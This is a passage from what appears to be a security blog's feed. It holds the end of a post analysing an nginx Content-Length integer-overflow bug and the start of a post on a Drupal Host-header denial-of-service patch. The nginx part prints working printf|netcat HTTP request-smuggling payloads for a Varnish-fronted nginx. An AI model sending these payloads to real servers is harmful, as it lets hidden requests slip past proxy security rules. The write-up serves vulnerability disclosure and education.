&lt;pre&gt;&lt;code&gt;printf &#39;GET /fic1.html HTTP/1.1\015\012&#39;\
&#39;Host: www.dummy-host.example.com\015\012&#39;\
&#39;Content-Type: application/x-www-form-urlencoded\015\012&#39;\
&#39;Content-Length:90000015 \015\012&#39;\
&#39;\015\012123456789012345&#39;\
&#39;GET http://www.dummy-host.example.com/fic2.html HTTP/1.1\015\012&#39;\
&#39;Host: www.dummy-host.example.com\015\012&#39;\
&#39;\015\012&#39;| netcat 127.0.0.1 80
-----------
HTTP/1.1 413 Request Entity Too Large
Server: nginx/1.2.1
Date: Wed, 25 Mar 2015 17:39:49 GMT
Content-Type: text/html
Content-Length: 198
Connection: close

&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;413 Request Entity Too Large&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;
&amp;lt;body bgcolor=&quot;white&quot;&amp;gt;
&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;413 Request Entity Too Large&amp;lt;/h1&amp;gt;&amp;lt;/center&amp;gt;
&amp;lt;hr&amp;gt;&amp;lt;center&amp;gt;nginx/1.2.1&amp;lt;/center&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The request sent is:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;1 - GET /fic1.html HTTP/1.1[CR][LF]
2 - Host: www.dummy-host.example.com[CR][LF]
3 - Content-Type: application/x-www-form-urlencoded[CR][LF]
4 - Content-Length:900000000000000000000000000000000000000000000000000000015 [CR][LF]
5 - [CR][LF]
6 - 123456789012345GET http://www.dummy-host.example.com/fic2.html HTTP/1.1[CR][LF]
7 - Host: www.dummy-host.example.com[CR][LF]
8 - [CR][LF]
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This is a GET request containing a Body (line 6 to 8) (something unusual, usually only POST queries should send body parts). The fact we have two responses for this request means Nginx is reading this request like a pipeline of two or more requests, this way:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# Request 1: a GET query with a body of size 15
1 - GET /fic1.html HTTP/1.1[CR][LF]
2 - Host: www.dummy-host.example.com[CR][LF]
3 - Content-Type: application/x-www-form-urlencoded[CR][LF]
4 - Content-Length: 15 [CR][LF]
5 - [CR][LF]
6 - 123456789012345 #&amp;lt;----------- this is 15 bytes
# Request 2: another request
6 - GET http://www.dummy-host.example.com/fic2.html HTTP/1.1[CR][LF]
7 - Host: www.dummy-host.example.com[CR][LF]
8 - [CR][LF]
&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;Integer Overflow truncation&lt;/h2&gt;

&lt;p&gt;We have this 900000000000000000000000000000000000000000000000000000015 read as 15, this is usually an integer overflow bug.
A bunch of functions in nginx could lead to such overflows, &lt;code&gt;ngx_atoi&lt;/code&gt;, &lt;code&gt;ngx_atofp&lt;/code&gt;, &lt;code&gt;ngx_atosz&lt;/code&gt;, &lt;code&gt;ngx_atoof&lt;/code&gt;, &lt;code&gt;ngx_atotm&lt;/code&gt; and &lt;code&gt;ngx_hextoi&lt;/code&gt;.
If I remember well, the one used for the Content-Length header parsing is &lt;code&gt;ngx_atosz&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Let&#39;s analyze one of the functions before the fix:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot; data-lang=&quot;c&quot;&gt;&lt;span class=&quot;kt&quot;&gt;size_t&lt;/span&gt;
    &lt;span class=&quot;nf&quot;&gt;ngx_atosz&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;u_char&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;line&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;kt&quot;&gt;size_t&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;n&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;kt&quot;&gt;ssize_t&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
   
        &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;n&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;NGX_ERROR&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
   
        &lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;value&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;n&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;--&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;line&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;line&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;lt;&lt;/span&gt; &lt;span class=&quot;sc&quot;&gt;&amp;#39;0&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;||&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;line&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;sc&quot;&gt;&amp;#39;9&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;NGX_ERROR&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
   
            &lt;span class=&quot;n&quot;&gt;value&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;value&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;line&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;sc&quot;&gt;&amp;#39;0&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
   
        &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;value&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;lt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;NGX_ERROR&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
   
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;The goal is to transform a text containing a number, like &quot;15&quot; to a number, 15. &lt;code&gt;line&lt;/code&gt; contains the string and &lt;code&gt;n&lt;/code&gt; is the string length. The &lt;code&gt;(*line &amp;lt; &#39;0&#39; || *line &amp;gt; &#39;9&#39;)&lt;/code&gt; test ensure each character of the line is really a digit.&lt;/p&gt;

&lt;p&gt;For each character the final number is computed by doing a &lt;code&gt;* 10&lt;/code&gt; with the previous compute value and then adding the digit.&lt;/p&gt;

&lt;p&gt;But with long strings of digits, comes a time when doing a &lt;code&gt;* 10&lt;/code&gt; in the C code makes your number smaller, because you hit the maximum value, with signed integers your result is at first a negative integer. When you&#39;ll hit the limit a second time you may end up with short positive values, and loop on the allowed ranges, or maybe not, the behavior is &lt;strong&gt;unknown&lt;/strong&gt;, it depends on the compiler, the OS, etc.&lt;/p&gt;

&lt;p&gt;On my own tests, one a local server, I was able to obtain a 15 quite easily with a string number containing a lot of &#39;0&#39; -- like the thing obtained by accident--. I don&#39;t really know why. somewhere in the loop &lt;code&gt;value&lt;/code&gt; comes to 0, one thing is sure, when you bypass the limits strange things happens.&lt;/p&gt;

&lt;p&gt;Remember that the final result may depend on your architecture:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;request Content-length / parsed Content Length
&#39;10&#39;                   =&amp;gt; 10
&#39;9224000000000000000&#39;  =&amp;gt; -9222744073709551616
&#39;36893488147419103231&#39; =&amp;gt; -1
&#39;36893488147419103232&#39; =&amp;gt; 0
&#39;36893488147419103233&#39; =&amp;gt; 1
&#39;36893488147419103247&#39; =&amp;gt; 15
&#39;368934881474191032320000000000015&#39; =&amp;gt; 15
&#39;3689348814741910323200000000000000000015&#39; =&amp;gt; 15
&#39;36893488147419104005&#39; =&amp;gt; 773
&#39;36893488147420000005&#39; =&amp;gt; 896773
&#39;90000000000000000000000000000000000000000000000000000&#39; =&amp;gt; -5507902344274116608
&#39;900000000000000000000000000000000000000000000000000000&#39; =&amp;gt; 261208778387488768
&#39;9000000000000000000000000000000000000000000000000000000&#39; =&amp;gt; 2612087783874887680
&#39;90000000000000000000000000000000000000000000000000000000&#39; =&amp;gt; 7674133765039325184
&#39;900000000000000000000000000000000000000000000000000000000&#39; =&amp;gt; 2954361355555045376
&#39;9000000000000000000000000000000000000000000000000000000000&#39; =&amp;gt; -7349874591868649472
&#39;90000000000000000000000000000000000000000000000000000000000&#39; =&amp;gt; 288230376151711744
&#39;900000000000000000000000000000000000000000000000000000000000000&#39; =&amp;gt; 4611686018427387904
&#39;9000000000000000000000000000000000000000000000000000000000000000&#39; =&amp;gt; -9223372036854775808
&#39;9999999999999999999999999999999999999999999991000000000000000000&#39; =&amp;gt; -9000000000000000000
&#39;9999999999999999999999999999999999999999999999900000000000000000&#39; =&amp;gt; -100000000000000000
&#39;9999999999999999999999999999999999999999999999990000000000000000&#39; =&amp;gt; -10000000000000000
&#39;9999999999999999999999999999999999999999999999999999999999999990&#39; =&amp;gt; -10
&#39;90000000000000000000000000000000000000000000000000000000000000000&#39; =&amp;gt; 0
&#39;90000000000000000000000000000000000000000000000000000000000000015&#39; =&amp;gt; 15
&#39;900000000000000000000000000000000000000000000000000000000000000000000000015&#39; =&amp;gt; 15
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The fixed version of this same function (my own proposal was a return as soon as &lt;code&gt;value&lt;/code&gt; was lower than previous value in the for loop):&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot; data-lang=&quot;c&quot;&gt;&lt;span class=&quot;kt&quot;&gt;ssize_t&lt;/span&gt;
    &lt;span class=&quot;nf&quot;&gt;ngx_atosz&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;u_char&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;line&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;kt&quot;&gt;size_t&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;n&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;kt&quot;&gt;ssize_t&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cutoff&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cutlim&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
   
        &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;n&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;NGX_ERROR&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
   
        &lt;span class=&quot;n&quot;&gt;cutoff&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;NGX_MAX_SIZE_T_VALUE&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;/&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;10&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;n&quot;&gt;cutlim&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;NGX_MAX_SIZE_T_VALUE&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;10&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
   
        &lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;value&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;n&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;--&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;line&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;line&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;lt;&lt;/span&gt; &lt;span class=&quot;sc&quot;&gt;&amp;#39;0&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;||&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;line&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;sc&quot;&gt;&amp;#39;9&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;NGX_ERROR&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    
            &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;value&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cutoff&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;value&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cutoff&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;||&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;line&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;sc&quot;&gt;&amp;#39;0&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cutlim&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;NGX_ERROR&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    
            &lt;span class=&quot;n&quot;&gt;value&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;value&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;line&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;sc&quot;&gt;&amp;#39;0&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    
        &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2&gt;Example of exploitation Varnish + Nginx&lt;/h2&gt;

&lt;p&gt;To exploit this integer truncation we have to send a very-very-very big content-length header, so big that we cannot really send such a big query (for example 36893488147419103232, the first 0, is 32 768 Petabytes); and we need to get the request body transferred to nginx without a buffering proxy (because we cannot wait for a full request buffering, we need the proxy to send the request to nginx while still receiving inputs). This can be done using Varnish (at least, they may be others). An Apache mod_proxy server would reject such a big Content-Length header, but not Varnish.&lt;/p&gt;

&lt;p&gt;We need a proxy because the basics of an HTTP Smuggling attack is precisely to have differences in the interpretation of the request by two actors, here the varnish proxy as first actor and the Nginx backend as the second one.&lt;/p&gt;

&lt;p&gt;Now when Nginx will receive this request from the Varnish proxy it will read a completely different and shorter Content-Length Header, and this means we can hide new HTTP requests in the transferred request body. Something than the proxy did not saw as a request.&lt;/p&gt;

&lt;p&gt;Note that we will never receive the results from that hidden query, and that we will have to close the initial query (because the number of bytes to transfer is too high). So there is no way of poisoning the reverse proxy cache (here Varnish). The only usage of such exploit is to bypass security rules that could be written in Varnish and forgotten in Nginx and use that to send a request where the result as no importance. A good defense in depth policy would enforce rewriting in Nginx security rules defined in the proxy, but if it is not the case this technique could be used to &lt;strong&gt;transfer a blind unfiltered request to Nginx&lt;/strong&gt; (blind because you will never get the response).&lt;/p&gt;

&lt;p&gt;This is the reason why this issue is not considered &quot;serious&quot; by the Nginx project. Alone this flaw is not very useful... but mighty oaks from little acorns grow.&lt;/p&gt;

&lt;p&gt;You could try something like that (here with varnish on port 8080 on 127.0.0.1, with nginx as a backend, and with a POST query containing two hidden queries in the body), try it only at home:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;printf &#39;POST /could_fail.html HTTP/1.1\015\012&#39;\
&#39;Host: www.dummy-host.example.com\015\012&#39;\
&#39;Content-Type: application/x-www-form-urlencoded\015\012&#39;\
&#39;Content-length: 9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000015\015\012&#39;\
&#39;\015\012123456789012345GET /hidden.html HTTP/1.1\015\012&#39;\
&#39;Host: www.dummy-host.example.com\015\012&#39;\
&#39;\015\012&#39;\
&#39;POST /could_fail.html HTTP/1.1\015\012&#39;\
&#39;Host: www.dummy-host.example.com\015\012&#39;\
&#39;Content-Type: application/x-www-form-urlencoded\015\012&#39;\
&#39;Content-Length: 1048570\015\012&#39;\
&#39;etc..aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&#39;
&#39;(... here a quite long filler, something like 500 characters at least because we need varnish&#39;\
&#39;to start transmission of the body and this requires some inputs...)aaaaaaaaaaaaaaaaaaaaaaaaaaa&#39;\
&#39;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&#39;| netcat 127.0.0.1 8080
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;You can try it with a wireshark and see that Nginx respond to all the queries (or you can check the access logs).&lt;/p&gt;

&lt;p&gt;I did not found any malloc error associated with theses integers overflows, but you are free to search that.&lt;/p&gt;

&lt;p&gt;My own conclusion would be: C, how is this still a thing :-)&lt;/p&gt;

&lt;p&gt;More seriously I find distressing that most web servers are still sensitive to low-level C errors like integer overflows, null strings, etc.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://twitter.com/regilero&quot;&gt;Stay tuned on twitter, @regilero&lt;/a&gt;, &lt;a href=&quot;https://twitter.com/makinacorpus&quot;&gt;@makinacorpus&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
				<published>2015-03-25 00:00:00 +0100</published>
				<link>http://regilero.github.io/english/security/2015/03/25/nginx-integer_truncation/</link>
			</item>
		
			<item>
				<title>AirPair, Drupal with PHP-FPM, Apache or Nginx</title>
				<description>&lt;h2&gt;AirPair&lt;/h2&gt;

&lt;p&gt;In the pasts I&#39;ve made some detailled posts about php-fpm for Drupal7 with Apache 2.2. Now you have the Apache 2.4 version which is easier to use with php-fpm. And if you do the things the right way it&#39;s also easy to replace Apache with Nginx.&lt;/p&gt;

&lt;p&gt;I made two posts on AirPair to explain all theses things quite deeply:(I apologize for the total lack of humility in the titles):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.airpair.com/nginx/posts/ultimate-guide-migrating-apache-to-nginx-1&quot;&gt;The Ultimate Guide to Migrating From Apache to Nginx: Part 1&lt;/a&gt; which covers the basics, php-fpm and Apache 2.4&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.airpair.com/nginx/posts/ultimate-guide-migrating-apache-to-nginx-2&quot;&gt;The Ultimate Guide to Migrating From Apache to Nginx: Part 2&lt;/a&gt; which covers Nginx&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;That&#39;s all.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://twitter.com/regilero&quot;&gt;Stay tuned on twitter, @regilero&lt;/a&gt;, &lt;a href=&quot;https://twitter.com/makinacorpus&quot;&gt;@makinacorpus&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
				<published>2014-10-30 00:00:00 +0100</published>
				<link>http://regilero.github.io/english/drupal/2014/10/30/drupal-nginx_apache_php-fpm-guide/</link>
			</item>
		
			<item>
				<title>Details of DRUPAL_SA_CORE_2014_003 Deny Of Service</title>
				<description>&lt;p&gt;&lt;small&gt;&lt;strong&gt;English version&lt;/strong&gt; (&lt;strong&gt;Version Française&lt;/strong&gt; disponible sur &lt;a href=&quot;http://makina-corpus.com/blog/metier/2014/details-of-drupal_sa_core_2014_003&quot;&gt;makina corpus&lt;/a&gt;.)&lt;/small&gt;&lt;/p&gt;

&lt;h2&gt;SA_CORE_2014_003&lt;/h2&gt;

&lt;p&gt;This summer Drupal versions &lt;a href=&quot;https://www.drupal.org/drupal-6.32-release-notes&quot;&gt;6.x&lt;/a&gt; and &lt;a href=&quot;https://www.drupal.org/drupal-7.29-release-notes&quot;&gt;7.29&lt;/a&gt; &amp;amp; &lt;a href=&quot;https://www.drupal.org/drupal-7.31-release-notes&quot;&gt;7.31&lt;/a&gt; have been released with some critical security fixs. Enough time as passed, so I will give some details one of the issues from &lt;a href=&quot;https://www.drupal.org/SA-CORE-2014-003&quot;&gt;SA-CORE-2014-003 - Drupal core - Multiple vulnerabilities&lt;/a&gt;. It contains 3 issues. The one we will study here is the Core &lt;strong&gt;Deny of Service&lt;/strong&gt; (DOS) issue which is also available in the CVE database as &lt;a href=&quot;http://www.cvedetails.com/cve/CVE-2014-5019/&quot;&gt;CVE-2014-5019&lt;/a&gt;. This post is a detailled explanation of how drupal is using the Host header of the http request to find the configuration file, and why this was usable in a deny of service attack even for websites not using the multisite feature. It contains some not very well known things on Host header manipulations, so I hope this will help other projects from avoiding theses issues.&lt;/p&gt;

&lt;p&gt;Note that there were a regression in Drupal 7.29, with images and files attached to taxonomy terms which has been fixed on the next release 7.30 (the regression was not about the patch discussed here).&lt;/p&gt;

&lt;p&gt;Note also that another core security issue has been fixed right after this one (&lt;a href=&quot;https://www.drupal.org/SA-CORE-2014-004&quot;&gt;SA-CORE-2014-004 - Drupal core - Multiple vulnerabilities&lt;/a&gt;, which was another DOS issue coming from &lt;code&gt;xmlrpc.php&lt;/code&gt;, so if you do not have something preventing remote access to this php file you should really upgrade your drupal code version to version &lt;code&gt;7.31&lt;/code&gt;. My own advice is to alter your Apache/Nginx configuration to only allow one PHP file, &lt;code&gt;index.php&lt;/code&gt;, this will prevent a loooot of problems.&lt;/p&gt;

&lt;p&gt;If you have some fears on updating the Core you can at least apply &lt;a href=&quot;https://www.drupal.org/files/issues/sec-D7-conf-path-dos-105258-23.patch&quot;&gt;the DOS patch&lt;/a&gt; for this first DOS issue (this is not the patch for the xmlrpc.php issue), which is quite simple:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;diff --git a/includes/bootstrap.inc b/includes/bootstrap.inc
index 0b81dc0..dc08dd6 100644
--- a/includes/bootstrap.inc
+++ b/includes/bootstrap.inc
@@ -700,7 +700,14 @@ function drupal_environment_initialize() {
  *  TRUE if only containing valid characters, or FALSE otherwise.
  */
 function drupal_valid_http_host($host) {
-  return preg_match(&#39;/^\[?(?:[a-zA-Z0-9-:\]_]+\.?)+$/&#39;, $host);
+  // Limit the length of the host name to 1000 bytes to prevent DoS attacks with
+  // long host names.
+  return strlen($host) &amp;lt;= 1000
+    // Limit the number of subdomains and port separators to prevent DoS attacks
+    // in conf_path().
+    &amp;amp;&amp;amp; substr_count($host, &#39;.&#39;) &amp;lt;= 100
+    &amp;amp;&amp;amp; substr_count($host, &#39;:&#39;) &amp;lt;= 100
+    &amp;amp;&amp;amp; preg_match(&#39;/^\[?(?:[a-zA-Z0-9-:\]_]+\.?)+$/&#39;, $host);
 }
&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;So, what was the problem?&lt;/h2&gt;

&lt;h3&gt;Spoofable Hostnames&lt;/h3&gt;

&lt;p&gt;By simply checking the patch we can see that the goal is to prevent :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;hostnames longer than 1000 characters&lt;/li&gt;
&lt;li&gt;hostnames with more than 100 dots (or subdomains)&lt;/li&gt;
&lt;li&gt;hostnames with more than 100 &lt;code&gt;:&lt;/code&gt; (used on ports and sometimes for IPv6)&lt;/li&gt;
&lt;/ul&gt;


